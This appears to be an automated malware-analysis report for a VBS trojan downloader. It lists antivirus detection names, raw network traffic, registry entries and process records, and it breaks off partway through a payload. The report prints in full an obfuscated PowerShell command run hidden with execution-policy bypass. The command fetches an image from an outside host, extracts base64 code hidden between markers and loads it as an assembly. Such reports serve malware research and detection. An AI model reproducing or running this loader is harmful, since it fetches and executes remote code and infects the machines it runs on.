IgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcU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UWCcUzBkdIBHShUWCcUzBkdIGcShUWCcUzBkdIPQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdIGQShUWCcUzBkdIZgBkShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIBzShUWCcUzBkdIGEShUWCcUzBkdIJwShUWCcUzBkdIgShUWCcUzBkdICwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIGQShUWCcUzBkdIZQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
Symantec | ISB.Downloader!gen40 |
Avast | Script:SNH-gen [Trj] |
Kaspersky | HEUR:Trojan.VBS.SAgent.gen |
Varist | VBS/Agent.BFC!Eldorado |
ZoneAlarm | HEUR:Trojan.VBS.SAgent.gen |
Detected | |
AVG | Script:SNH-gen [Trj] |
Data received | [ |
Data received | We<Ý"=±Å¿þlJ_ÖhWFIpðæDOWNGRD ' jC _ÿá''GËfÁãò.}õÀ ÿ |
Data received | Q |
Data received | |
Data received | AF¯Bi¤8¼MG@Ê>Hð¡@oÅöbnz%ã¶}åóà°ÐÀ#Ø/LËjwxØÌy_¸x H0F! ÜZ ±v f)â ɬ·V±»/RóÓùò! 9Í)GìÑ öqÂ{3@Ö,8ç ©, ôöªðr |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | µe['³-J*ÎÀÇç}$WoqÃýû**QQÕ.Ý©U4Ñëø6æþ J- |
Data sent | y ue<Ý Ùö¹É¿j(mM8GÑ·¹(AýE #¨ / 5 ÀÀÀ À 2 8 4ÿ uploaddeimagens.com.br |
Data sent | F BAFm¶L3Û¥º_ {0{ r±¼>¹oÏÜ ¾#©Y×ù»ñ<ùC0/zÌH7Òsrï 0wA×;çÖpJMF6^¬ªÓÊp¢D²jèî |3µ$µ³RtÂ\ |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIEMShUWCcUzBkdIbwBuShUWCcUzBkdIHYShUWCcUzBkdIZQByShUWCcUzBkdIHQShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdIRgByShUWCcUzBkdIG8ShUWCcUzBkdIbQBCShUWCcUzBkdIGEShUWCcUzBkdIcwBlShUWCcUzBkdIDYShUWCcUzBkdINShUWCcUzBkdIBTShUWCcUzBkdIHQShUWCcUzBkdIcgBpShUWCcUzBkdIG4ShUWCcUzBkdIZwShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdI